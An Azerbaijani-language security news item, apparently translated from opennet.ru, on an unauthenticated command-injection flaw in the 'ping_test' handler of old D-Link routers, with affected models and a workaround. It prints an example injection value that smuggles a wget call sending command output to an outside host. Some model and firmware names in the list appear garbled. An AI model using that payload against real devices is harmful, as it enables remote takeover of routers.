D-Link simsiz marşrutlaşdırıcılarında təhlükəli zəiflik (), bu, identifikasiyası olmadan əldə edilə bilən “ping_test” işləyicisinə xüsusi sorğu göndərməklə cihaz tərəfində kodu uzaqdan icra etməyə imkan verir.
Maraqlıdır ki, proqram təminatı tərtibatçılarının fikrincə, “ping_test” çağırışı yalnız autentifikasiyadan sonra yerinə yetirilməlidir, lakin əslində o, veb interfeysinə daxil olmaqdan asılı olmayaraq istənilən halda çağırılır. Xüsusilə, apply_sec.cgi skriptinə daxil olduqda və “action=ping_test” parametrini keçərkən, skript autentifikasiya səhifəsinə yönləndirir, lakin eyni zamanda ping_test ilə əlaqəli hərəkəti yerinə yetirir. Kodu icra etmək üçün ping_test-in özündə başqa bir boşluqdan istifadə edilib, o, sınaq üçün göndərilmiş IP ünvanının düzgünlüyünü düzgün yoxlamadan ping yardım proqramını çağırır. Məsələn, wget yardım proqramına zəng etmək və “echo 1234” əmrinin nəticələrini xarici hosta köçürmək üçün “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://” parametrini göstərmək kifayətdir. test.test/?$( echo 1234)".
Zəifliyin mövcudluğu aşağıdakı modellərdə rəsmi olaraq təsdiqlənib:
- 655b3.02 və ya daha köhnə proqram təminatı ilə DIR-05;
- 866b1.03 və ya daha köhnə proqram təminatı ilə DIR-04L;
- 1565 və ya daha köhnə proqram təminatı ilə DIR-1.01;
- DIR-652 (problemli proqram təminatı versiyaları haqqında məlumat verilmir)
Bu modellər üçün dəstək müddəti artıq başa çatıb, ona görə də D-Link , zəifliyi aradan qaldırmaq üçün onlar üçün yeniləmələr buraxmayacaq, onlardan istifadə etməyi tövsiyə etmir və onları yeni cihazlarla əvəz etməyi məsləhət görür. Təhlükəsizliyə qarşı həll yolu olaraq, veb interfeysinə girişi yalnız etibarlı IP ünvanları ilə məhdudlaşdıra bilərsiniz.
Sonradan məlum oldu ki, zəiflik də var DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 və DIR-825 modelləri, yeniləmələrin buraxılması planları hələ məlum deyil.
Mənbə: opennet.ru